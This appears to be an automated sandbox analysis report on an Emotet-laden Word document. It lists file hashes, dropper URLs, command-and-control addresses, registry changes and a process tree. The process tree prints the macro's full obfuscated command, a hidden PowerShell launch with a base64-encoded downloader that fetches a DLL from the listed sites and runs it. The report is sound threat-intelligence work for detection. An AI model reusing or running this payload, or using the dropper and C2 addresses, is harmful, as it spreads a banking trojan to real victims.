emotet | 82e92d510859b29c43413bc9f931a3746384e96783916811dbbdaf6cf5122c13

General

Target

19633.doc
Size

112KB
MD5

66d78e2b8178b341db514213ae161b51
SHA1

79200c539f1a55c1c7ed2a7ad0e8cba72901e521
SHA256

82e92d510859b29c43413bc9f931a3746384e96783916811dbbdaf6cf5122c13
SHA512

fc7931758394f0ba59654039a875fdf34219fdd9a62b6f38b87355ec195e9862393fdf957b5ee21dc8d1d3c40b68444830c9e2e463f13dcaddae6fedcd5a97a0

Score

10^/10

emotet epoch3 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://imedu.org/u/cV/

exe.dropper

https://omarisouza.com/cgi-bin/Systems/

exe.dropper

http://eco-mykolaiv.info/f/debug/

exe.dropper

http://smartintelligentsolutions.com/content/microsoft/

exe.dropper

http://ehteknology.com/wp-includes/en-US/

exe.dropper

https://ancorals.com/aminophenol/Stationery/

Extracted

Family

emotet

Botnet

Epoch3

C2

125.0.215.60:80

163.53.204.180:443

89.163.210.141:8080

203.157.152.9:7080

157.245.145.87:443

82.78.179.117:443

85.247.144.202:80

37.46.129.215:8080

110.37.224.243:80

192.210.217.94:8080

2.82.75.215:80

69.159.11.38:443

188.166.220.180:7080

103.93.220.182:80

198.20.228.9:8080

91.75.75.46:80

88.247.30.64:80

189.211.214.19:443

203.160.167.243:80

178.33.167.120:8080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 1688 cmd.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

7 1152 powershell.exe
9 1608 rundll32.exe
Loads dropped DLL 4 IoCs

Processes:

rundll32.exe

pid process

2028 rundll32.exe
2028 rundll32.exe
2028 rundll32.exe
2028 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1680	1688	cmd.exe

flow	pid	process
7	1152	powershell.exe
9	1608	rundll32.exe

pid	process
2028	rundll32.exe
2028	rundll32.exe
2028	rundll32.exe
2028	rundll32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Peuckxwz\xomujyo.fsq	rundll32.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1096 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exerundll32.exe

pid process

1152 powershell.exe
1152 powershell.exe
1608 rundll32.exe
1608 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1152 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1096 WINWORD.EXE
1096 WINWORD.EXE

pid	process
1096	WINWORD.EXE

pid	process
1152	powershell.exe
1152	powershell.exe
1608	rundll32.exe
1608	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	1152	powershell.exe

pid	process
1096	WINWORD.EXE
1096	WINWORD.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1680 wrote to memory of 1756	1680	cmd.exe	msg.exe
PID 1680 wrote to memory of 1756	1680	cmd.exe	msg.exe
PID 1680 wrote to memory of 1756	1680	cmd.exe	msg.exe
PID 1680 wrote to memory of 1152	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 1152	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 1152	1680	cmd.exe	powershell.exe
PID 1152 wrote to memory of 1276	1152	powershell.exe	rundll32.exe
PID 1152 wrote to memory of 1276	1152	powershell.exe	rundll32.exe
PID 1152 wrote to memory of 1276	1152	powershell.exe	rundll32.exe
PID 1276 wrote to memory of 2028	1276	rundll32.exe	rundll32.exe
PID 1276 wrote to memory of 2028	1276	rundll32.exe	rundll32.exe
PID 1276 wrote to memory of 2028	1276	rundll32.exe	rundll32.exe
PID 1276 wrote to memory of 2028	1276	rundll32.exe	rundll32.exe
PID 1276 wrote to memory of 2028	1276	rundll32.exe	rundll32.exe
PID 1276 wrote to memory of 2028	1276	rundll32.exe	rundll32.exe
PID 1276 wrote to memory of 2028	1276	rundll32.exe	rundll32.exe
PID 2028 wrote to memory of 1608	2028	rundll32.exe	rundll32.exe
PID 2028 wrote to memory of 1608	2028	rundll32.exe	rundll32.exe
PID 2028 wrote to memory of 1608	2028	rundll32.exe	rundll32.exe
PID 2028 wrote to memory of 1608	2028	rundll32.exe	rundll32.exe
PID 2028 wrote to memory of 1608	2028	rundll32.exe	rundll32.exe
PID 2028 wrote to memory of 1608	2028	rundll32.exe	rundll32.exe
PID 2028 wrote to memory of 1608	2028	rundll32.exe	rundll32.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\19633.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1096

C:\Windows\system32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMARQBUAC0AaQB0AEUAbQAgACAAKAAnAFYAJwArACcAQQAnACsAJwBSAGkAYQBCAEwARQA6ADEAMgAnACsAJwBHACcAKwAnADgARQBKACcAKQAgACgAIAAgAFsAVAB5AHAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiAC0ARgAnAE0ALgBJAG8ALgBEAGkAcgBlAEMAVABvAHIAWQAnACwAJwBzAFkAJwAsACcAUwAnACwAJwBUAGUAJwApACAAIAApACAAOwAgACAAIAAgAFMARQBUAC0AaQBUAEUAbQAgAHYAQQBSAEkAYQBiAEwARQA6AFoAOABBAGsAWQAzACAAIAAoACAAIABbAHQAeQBwAGUAXQAoACIAewA1AH0AewAyAH0AewA0AH0AewAzAH0AewAxAH0AewAwAH0AewA3AH0AewA4AH0AewA2AH0AIgAtAEYAIAAnAGUAcABPACcALAAnAHMAZQBSAHYASQBjACcALAAnAFQAZQAnACwAJwBuAGUAVAAuACcALAAnAG0ALgAnACwAJwBTAFkAUwAnACwAJwBhAEcARQByACcALAAnAGkAbgB0ACcALAAnAE0AYQBuACcAKQAgACkAIAAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlAG4AdABsAHkAJwArACcAQwBvACcAKQArACcAbgAnACsAKAAnAHQAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQARwB4AGgAYwBhAGwAaAA9ACQAQwA1ADQAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQgA3ADcAWQA7ACQAUgA2ADkARwA9ACgAJwBQADMAJwArACcAOABUACcAKQA7ACAAIAAkADEAMgBHADgAZQBqADoAOgAiAEMAYABSAGUAQQBUAGAARQBkAGkAYABSAGUAYwBUAG8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIAJwArACcARgBiAE8AJwArACcANwBmADIAMgAnACkAKwAoACcAMAAnACsAJwBpAEIAJwApACsAJwBGAGIAJwArACcARwAnACsAJwA2AG4AJwArACgAJwAwAGMAJwArACcAYgAnACkAKwAoACcAYgBCACcAKwAnAEYAYgAnACkAKQAuACIAUgBFAFAAbABBAGAAYwBlACIAKAAoACcAQgAnACsAJwBGAGIAJwApACwAJwBcACcAKQApACkAOwAkAFMANwAxAEoAPQAoACgAJwBCADgAJwArACcAMwAnACkAKwAnAFIAJwApADsAIAAgACgAIAAgAHYAYQByAGkAQQBCAEwAZQAgACAAWgA4AGEASwB5ADMAIAAgACkALgB2AGEATABVAEUAOgA6ACIAcwBgAEUAQwBgAFUAUgBJAFQAYAB5AHAAcgBvAHQATwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABKADMANwBOAD0AKAAoACcATwBfACcAKwAnADQAJwApACsAJwBTACcAKQA7ACQASQBsAHUAOQBiAGMAbAAgAD0AIAAoACcARwA3ACcAKwAnADkARgAnACkAOwAkAFMAOQBfAEMAPQAoACgAJwBTACcAKwAnADUANAAnACkAKwAnAE0AJwApADsAJABZAHEAZwBrAHAANgBsAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACcATwA3ACcAKwAoACcAZgAyACcAKwAnADIAMABpACcAKQArACcAewAwAH0AJwArACcARwA2ACcAKwAoACcAbgAnACsAJwAwAGMAYgBiACcAKQArACcAewAwAH0AJwApACAALQBmAFsAQwBoAGEAcgBdADkAMgApACsAJABJAGwAdQA5AGIAYwBsACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgA1AF8AVQA9ACgAJwBKADUAJwArACcAMABRACcAKQA7ACQATgBwAGgAegBoAGwAYQA9ACgAKAAnAF0AYQBuAHcAJwArACcAWwAzACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGkAJwArACcAbQAnACsAKAAnAGUAJwArACcAZAB1ACcAKQArACcALgAnACsAKAAnAG8AJwArACcAcgBnACcAKQArACgAJwAvAHUAJwArACcALwBjACcAKQArACcAVgAvACcAKwAnAEAAXQAnACsAJwBhACcAKwAoACcAbgB3AFsAJwArACcAMwBzACcAKwAnADoALwAnACkAKwAoACcALwBvAG0AYQByACcAKwAnAGkAcwAnACkAKwAnAG8AdQAnACsAJwB6AGEAJwArACcALgBjACcAKwAoACcAbwAnACsAJwBtAC8AJwApACsAJwBjACcAKwAoACcAZwAnACsAJwBpAC0AYgAnACkAKwAnAGkAbgAnACsAKAAnAC8AUwB5AHMAdABlACcAKwAnAG0AcwAnACsAJwAvAEAAXQBhAG4AJwApACsAJwB3AFsAJwArACcAMwAnACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwBlACcAKwAnAGMAbwAtAG0AeQBrACcAKwAnAG8AJwArACcAbABhACcAKwAnAGkAdgAuAGkAJwApACsAJwBuACcAKwAoACcAZgBvACcAKwAnAC8AZgAvACcAKQArACgAJwBkACcAKwAnAGUAYgAnACkAKwAoACcAdQAnACsAJwBnAC8AQABdACcAKwAnAGEAJwApACsAJwBuACcAKwAoACcAdwAnACsAJwBbADMAJwArACcAOgAvAC8AJwApACsAJwBzACcAKwAoACcAbQAnACsAJwBhACcAKwAnAHIAdABpACcAKwAnAG4AdABlAGwAJwApACsAKAAnAGwAaQBnAGUAJwArACcAbgAnACsAJwB0AHMAJwApACsAJwBvAGwAJwArACgAJwB1AHQAJwArACcAaQAnACkAKwAoACcAbwBuAHMALgBjAG8AJwArACcAbQAvACcAKwAnAGMAJwApACsAKAAnAG8AbgB0ACcAKwAnAGUAbgB0ACcAKQArACgAJwAvACcAKwAnAG0AaQAnACkAKwAoACcAYwAnACsAJwByACcAKwAnAG8AcwBvAGYAJwApACsAJwB0ACcAKwAnAC8AJwArACgAJwBAAF0AYQAnACsAJwBuAHcAWwAnACkAKwAnADMAOgAnACsAKAAnAC8ALwBlAGgAJwArACcAdABlACcAKQArACgAJwBrACcAKwAnAG4AbwAnACsAJwBsACcAKwAnAG8AZwB5AC4AYwBvACcAKQArACgAJwBtAC8AJwArACcAdwBwAC0AaQBuACcAKQArACcAYwBsACcAKwAnAHUAJwArACgAJwBkAGUAJwArACcAcwAvAGUAJwArACcAbgAtAFUAUwAvACcAKQArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAWwAnACsAJwAzAHMAOgAvAC8AJwArACcAYQBuAGMAJwApACsAKAAnAG8AcgBhAGwAcwAuACcAKwAnAGMAbwBtAC8AJwArACcAYQAnACsAJwBtAGkAJwArACcAbgBvAHAAaABlAG4AbwBsACcAKwAnAC8AJwArACcAUwAnACkAKwAoACcAdABhAHQAaQAnACsAJwBvAG4AJwApACsAJwBlAHIAJwArACcAeQAvACcAKQAuACIAUgBlAGAAcABMAEEAYwBFACIAKAAoACcAXQBhACcAKwAoACcAbgB3ACcAKwAnAFsAMwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAEwASQBUACIAKAAkAE0AXwAzAEgAIAArACAAJABHAHgAaABjAGEAbABoACAAKwAgACQAUQBfAF8ASAApADsAJABEADkAOQBDAD0AKAAoACcASQAnACsAJwA4ADEAJwApACsAJwBZACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBqAF8AOQBmADkAbAAgAGkAbgAgACQATgBwAGgAegBoAGwAYQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAcwBZAFMAVABFAE0ALgBuAGUAdAAuAFcAZQBCAGMATABpAEUAbgB0ACkALgAiAGQAYABPAHcAbgBMAGAATwBgAEEARABGAEkAbABlACIAKAAkAFEAagBfADkAZgA5AGwALAAgACQAWQBxAGcAawBwADYAbAApADsAJABBADAAMQBPAD0AKAAnAEMAXwAnACsAJwA2AEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFkAcQBnAGsAcAA2AGwAKQAuACIATABFAE4AZwBgAFQASAAiACAALQBnAGUAIAAzADEANwAyADMAKQAgAHsALgAoACcAcgB1AG4AZABsAGwAJwArACcAMwAnACsAJwAyACcAKQAgACQAWQBxAGcAawBwADYAbAAsACgAJwBDACcAKwAoACcAbwBuAHQAcgBvACcAKwAnAGwAJwApACsAKAAnAF8AUgAnACsAJwB1AG4AJwApACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgBUAG8AcwBUAFIAYABpAGAATgBnACIAKAApADsAJABTADIAMQBWAD0AKAAnAE4AOAAnACsAJwAwAEMAJwApADsAYgByAGUAYQBrADsAJABLADEAMgBWAD0AKAAnAFEAJwArACgAJwBfACcAKwAnADUASgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBfAF8ARAA9ACgAKAAnAFYAOAAnACsAJwAwACcAKQArACcAQwAnACkA
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:1756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwersheLL -w hidden -ENCOD IAAgAHMARQBUAC0AaQB0AEUAbQAgACAAKAAnAFYAJwArACcAQQAnACsAJwBSAGkAYQBCAEwARQA6ADEAMgAnACsAJwBHACcAKwAnADgARQBKACcAKQAgACgAIAAgAFsAVAB5AHAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiAC0ARgAnAE0ALgBJAG8ALgBEAGkAcgBlAEMAVABvAHIAWQAnACwAJwBzAFkAJwAsACcAUwAnACwAJwBUAGUAJwApACAAIAApACAAOwAgACAAIAAgAFMARQBUAC0AaQBUAEUAbQAgAHYAQQBSAEkAYQBiAEwARQA6AFoAOABBAGsAWQAzACAAIAAoACAAIABbAHQAeQBwAGUAXQAoACIAewA1AH0AewAyAH0AewA0AH0AewAzAH0AewAxAH0AewAwAH0AewA3AH0AewA4AH0AewA2AH0AIgAtAEYAIAAnAGUAcABPACcALAAnAHMAZQBSAHYASQBjACcALAAnAFQAZQAnACwAJwBuAGUAVAAuACcALAAnAG0ALgAnACwAJwBTAFkAUwAnACwAJwBhAEcARQByACcALAAnAGkAbgB0ACcALAAnAE0AYQBuACcAKQAgACkAIAAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlAG4AdABsAHkAJwArACcAQwBvACcAKQArACcAbgAnACsAKAAnAHQAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQARwB4AGgAYwBhAGwAaAA9ACQAQwA1ADQAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQgA3ADcAWQA7ACQAUgA2ADkARwA9ACgAJwBQADMAJwArACcAOABUACcAKQA7ACAAIAAkADEAMgBHADgAZQBqADoAOgAiAEMAYABSAGUAQQBUAGAARQBkAGkAYABSAGUAYwBUAG8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIAJwArACcARgBiAE8AJwArACcANwBmADIAMgAnACkAKwAoACcAMAAnACsAJwBpAEIAJwApACsAJwBGAGIAJwArACcARwAnACsAJwA2AG4AJwArACgAJwAwAGMAJwArACcAYgAnACkAKwAoACcAYgBCACcAKwAnAEYAYgAnACkAKQAuACIAUgBFAFAAbABBAGAAYwBlACIAKAAoACcAQgAnACsAJwBGAGIAJwApACwAJwBcACcAKQApACkAOwAkAFMANwAxAEoAPQAoACgAJwBCADgAJwArACcAMwAnACkAKwAnAFIAJwApADsAIAAgACgAIAAgAHYAYQByAGkAQQBCAEwAZQAgACAAWgA4AGEASwB5ADMAIAAgACkALgB2AGEATABVAEUAOgA6ACIAcwBgAEUAQwBgAFUAUgBJAFQAYAB5AHAAcgBvAHQATwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABKADMANwBOAD0AKAAoACcATwBfACcAKwAnADQAJwApACsAJwBTACcAKQA7ACQASQBsAHUAOQBiAGMAbAAgAD0AIAAoACcARwA3ACcAKwAnADkARgAnACkAOwAkAFMAOQBfAEMAPQAoACgAJwBTACcAKwAnADUANAAnACkAKwAnAE0AJwApADsAJABZAHEAZwBrAHAANgBsAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACcATwA3ACcAKwAoACcAZgAyACcAKwAnADIAMABpACcAKQArACcAewAwAH0AJwArACcARwA2ACcAKwAoACcAbgAnACsAJwAwAGMAYgBiACcAKQArACcAewAwAH0AJwApACAALQBmAFsAQwBoAGEAcgBdADkAMgApACsAJABJAGwAdQA5AGIAYwBsACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgA1AF8AVQA9ACgAJwBKADUAJwArACcAMABRACcAKQA7ACQATgBwAGgAegBoAGwAYQA9ACgAKAAnAF0AYQBuAHcAJwArACcAWwAzACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGkAJwArACcAbQAnACsAKAAnAGUAJwArACcAZAB1ACcAKQArACcALgAnACsAKAAnAG8AJwArACcAcgBnACcAKQArACgAJwAvAHUAJwArACcALwBjACcAKQArACcAVgAvACcAKwAnAEAAXQAnACsAJwBhACcAKwAoACcAbgB3AFsAJwArACcAMwBzACcAKwAnADoALwAnACkAKwAoACcALwBvAG0AYQByACcAKwAnAGkAcwAnACkAKwAnAG8AdQAnACsAJwB6AGEAJwArACcALgBjACcAKwAoACcAbwAnACsAJwBtAC8AJwApACsAJwBjACcAKwAoACcAZwAnACsAJwBpAC0AYgAnACkAKwAnAGkAbgAnACsAKAAnAC8AUwB5AHMAdABlACcAKwAnAG0AcwAnACsAJwAvAEAAXQBhAG4AJwApACsAJwB3AFsAJwArACcAMwAnACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwBlACcAKwAnAGMAbwAtAG0AeQBrACcAKwAnAG8AJwArACcAbABhACcAKwAnAGkAdgAuAGkAJwApACsAJwBuACcAKwAoACcAZgBvACcAKwAnAC8AZgAvACcAKQArACgAJwBkACcAKwAnAGUAYgAnACkAKwAoACcAdQAnACsAJwBnAC8AQABdACcAKwAnAGEAJwApACsAJwBuACcAKwAoACcAdwAnACsAJwBbADMAJwArACcAOgAvAC8AJwApACsAJwBzACcAKwAoACcAbQAnACsAJwBhACcAKwAnAHIAdABpACcAKwAnAG4AdABlAGwAJwApACsAKAAnAGwAaQBnAGUAJwArACcAbgAnACsAJwB0AHMAJwApACsAJwBvAGwAJwArACgAJwB1AHQAJwArACcAaQAnACkAKwAoACcAbwBuAHMALgBjAG8AJwArACcAbQAvACcAKwAnAGMAJwApACsAKAAnAG8AbgB0ACcAKwAnAGUAbgB0ACcAKQArACgAJwAvACcAKwAnAG0AaQAnACkAKwAoACcAYwAnACsAJwByACcAKwAnAG8AcwBvAGYAJwApACsAJwB0ACcAKwAnAC8AJwArACgAJwBAAF0AYQAnACsAJwBuAHcAWwAnACkAKwAnADMAOgAnACsAKAAnAC8ALwBlAGgAJwArACcAdABlACcAKQArACgAJwBrACcAKwAnAG4AbwAnACsAJwBsACcAKwAnAG8AZwB5AC4AYwBvACcAKQArACgAJwBtAC8AJwArACcAdwBwAC0AaQBuACcAKQArACcAYwBsACcAKwAnAHUAJwArACgAJwBkAGUAJwArACcAcwAvAGUAJwArACcAbgAtAFUAUwAvACcAKQArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAWwAnACsAJwAzAHMAOgAvAC8AJwArACcAYQBuAGMAJwApACsAKAAnAG8AcgBhAGwAcwAuACcAKwAnAGMAbwBtAC8AJwArACcAYQAnACsAJwBtAGkAJwArACcAbgBvAHAAaABlAG4AbwBsACcAKwAnAC8AJwArACcAUwAnACkAKwAoACcAdABhAHQAaQAnACsAJwBvAG4AJwApACsAJwBlAHIAJwArACcAeQAvACcAKQAuACIAUgBlAGAAcABMAEEAYwBFACIAKAAoACcAXQBhACcAKwAoACcAbgB3ACcAKwAnAFsAMwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAEwASQBUACIAKAAkAE0AXwAzAEgAIAArACAAJABHAHgAaABjAGEAbABoACAAKwAgACQAUQBfAF8ASAApADsAJABEADkAOQBDAD0AKAAoACcASQAnACsAJwA4ADEAJwApACsAJwBZACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBqAF8AOQBmADkAbAAgAGkAbgAgACQATgBwAGgAegBoAGwAYQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAcwBZAFMAVABFAE0ALgBuAGUAdAAuAFcAZQBCAGMATABpAEUAbgB0ACkALgAiAGQAYABPAHcAbgBMAGAATwBgAEEARABGAEkAbABlACIAKAAkAFEAagBfADkAZgA5AGwALAAgACQAWQBxAGcAawBwADYAbAApADsAJABBADAAMQBPAD0AKAAnAEMAXwAnACsAJwA2AEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFkAcQBnAGsAcAA2AGwAKQAuACIATABFAE4AZwBgAFQASAAiACAALQBnAGUAIAAzADEANwAyADMAKQAgAHsALgAoACcAcgB1AG4AZABsAGwAJwArACcAMwAnACsAJwAyACcAKQAgACQAWQBxAGcAawBwADYAbAAsACgAJwBDACcAKwAoACcAbwBuAHQAcgBvACcAKwAnAGwAJwApACsAKAAnAF8AUgAnACsAJwB1AG4AJwApACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgBUAG8AcwBUAFIAYABpAGAATgBnACIAKAApADsAJABTADIAMQBWAD0AKAAnAE4AOAAnACsAJwAwAEMAJwApADsAYgByAGUAYQBrADsAJABLADEAMgBWAD0AKAAnAFEAJwArACgAJwBfACcAKwAnADUASgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBfAF8ARAA9ACgAKAAnAFYAOAAnACsAJwAwACcAKQArACcAQwAnACkA
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\O7f220i\G6n0cbb\G79F.dll Control_RunDLL
3⤵
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\O7f220i\G6n0cbb\G79F.dll Control_RunDLL
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Peuckxwz\xomujyo.fsq",Control_RunDLL
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1608

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\O7f220i\G6n0cbb\G79F.dll
MD5
f370277b9b7e946c92a646d5a0295cb3

SHA1
49108e254990c1dba8e07667adf5182ba3586b59

SHA256
e69b446d35567456f0769faf9bb7ecfcd2a1e9b82669ae1e490a5657e8110cac

SHA512
9a7c0f7c5a94f17b3797f62ba67982fc07e6162d5f555090f6c73de1d7342e25d740bb6327d96beb38bacbbcc14f7f083fafddef914a02d9695b366bbffb508d

Download Submit
\Users\Admin\O7f220i\G6n0cbb\G79F.dll
MD5
f370277b9b7e946c92a646d5a0295cb3

SHA1
49108e254990c1dba8e07667adf5182ba3586b59

SHA256
e69b446d35567456f0769faf9bb7ecfcd2a1e9b82669ae1e490a5657e8110cac

SHA512
9a7c0f7c5a94f17b3797f62ba67982fc07e6162d5f555090f6c73de1d7342e25d740bb6327d96beb38bacbbcc14f7f083fafddef914a02d9695b366bbffb508d

Download Submit
\Users\Admin\O7f220i\G6n0cbb\G79F.dll
MD5
f370277b9b7e946c92a646d5a0295cb3

SHA1
49108e254990c1dba8e07667adf5182ba3586b59

SHA256
e69b446d35567456f0769faf9bb7ecfcd2a1e9b82669ae1e490a5657e8110cac

SHA512
9a7c0f7c5a94f17b3797f62ba67982fc07e6162d5f555090f6c73de1d7342e25d740bb6327d96beb38bacbbcc14f7f083fafddef914a02d9695b366bbffb508d

Download Submit
\Users\Admin\O7f220i\G6n0cbb\G79F.dll
MD5
f370277b9b7e946c92a646d5a0295cb3

SHA1
49108e254990c1dba8e07667adf5182ba3586b59

SHA256
e69b446d35567456f0769faf9bb7ecfcd2a1e9b82669ae1e490a5657e8110cac

SHA512
9a7c0f7c5a94f17b3797f62ba67982fc07e6162d5f555090f6c73de1d7342e25d740bb6327d96beb38bacbbcc14f7f083fafddef914a02d9695b366bbffb508d

Download Submit
\Users\Admin\O7f220i\G6n0cbb\G79F.dll
MD5
f370277b9b7e946c92a646d5a0295cb3

SHA1
49108e254990c1dba8e07667adf5182ba3586b59

SHA256
e69b446d35567456f0769faf9bb7ecfcd2a1e9b82669ae1e490a5657e8110cac

SHA512
